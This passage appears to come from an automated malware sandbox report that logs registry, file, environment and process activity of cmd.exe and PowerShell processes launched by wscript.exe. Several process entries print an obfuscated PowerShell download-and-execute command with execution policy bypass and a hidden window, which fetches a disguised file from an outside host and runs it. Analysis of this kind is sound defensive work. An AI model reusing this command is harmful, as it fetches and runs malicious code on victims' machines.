Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:47:03 (UTC) True 1
Fn
Get Time type = Ticks, time = 191007 True 1
Fn
Get Time type = Performance Ctr, time = 24557535269 True 1
Fn
Environment (15)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #39: cmd.exe
57 0
»
Information Value
ID #39
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:59, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:25
OS Process Information
»
Information Value
PID 0xc04
Parent PID 0xb6c (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C08
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xc5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:47:03 (UTC) True 1
Fn
Get Time type = Ticks, time = 190960 True 1
Fn
Get Time type = Performance Ctr, time = 24552336016 True 1
Fn
Environment (15)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #40: powershell.exe
295 0
»
Information Value
ID #40
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:02:01, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:24
OS Process Information
»
Information Value
PID 0xc54
Parent PID 0x8c0 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C58
0x C74
0x C84
0x CA0
0x CA8
0x CC8
0x CCC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x7FF00181000 0x7FF00181FFF First Execution - 64-bit 0x7FF00181032 False False
...
powershell.exe 0x13FF20000 0x13FF96FFF Relevant Image - 64-bit - False False
...
buffer 0x02C5B000 0x02C67FFF First Execution - 64-bit 0x02C664E0, 0x02C67308, ... False False
...
buffer 0x7FF0010B000 0x7FF0010BFFF First Execution - 64-bit 0x7FF0010B000 False False
...
buffer 0x7FF00135000 0x7FF00135FFF First Execution - 64-bit 0x7FF0013507D False False
...
buffer 0x7FF00133000 0x7FF00133FFF First Execution - 64-bit 0x7FF001335FD False False
...
buffer 0x7FF00136000 0x7FF00136FFF First Execution - 64-bit 0x7FF0013607D False False
...
buffer 0x7FF0010E000 0x7FF0010EFFF First Execution - 64-bit 0x7FF0010E820 False False
...
buffer 0x7FF00270000 0x7FF00270FFF First Execution - 64-bit 0x7FF00270130 False False
...
Host Behavior
File (61)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (88)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key Media Center - True 1
Fn
Open Key Media Center\PowerShell - False 1
Fn
Open Key OAlerts - True 1
Fn
Open Key OAlerts\PowerShell - False 1
Fn
Open Key Security - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value - value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (61)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 55
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #41: powershell.exe
298 0
»
Information Value
ID #41
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:02:01, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:24
OS Process Information
»
Information Value
PID 0xc5c
Parent PID 0xc04 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C60
0x C78
0x C88
0x C9C
0x CA4
0x CB4
0x CD4
0x CDC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
powershell.exe 0x13FF20000 0x13FF96FFF Relevant Image - 64-bit - False False
...
buffer 0x7FF00182000 0x7FF00182FFF First Execution - 64-bit 0x7FF00182020 False False
...
buffer 0x7FF00033000 0x7FF00033FFF First Execution - 64-bit 0x7FF00033B38, 0x7FF00033638 False False
...
buffer 0x7FF0010E000 0x7FF0010EFFF First Execution - 64-bit 0x7FF0010E820, 0x7FF0010E000 False False
...
buffer 0x7FF00135000 0x7FF00135FFF First Execution - 64-bit 0x7FF0013507D False False
...
buffer 0x7FF00133000 0x7FF00133FFF First Execution - 64-bit 0x7FF00133A20, 0x7FF00133A7D False False
...
buffer 0x7FF00136000 0x7FF00136FFF First Execution - 64-bit 0x7FF0013607D False False
...
buffer 0x7FF00270000 0x7FF00270FFF First Execution - 64-bit 0x7FF00270130 False False
...
Host Behavior
File (62)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (87)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 2
Fn
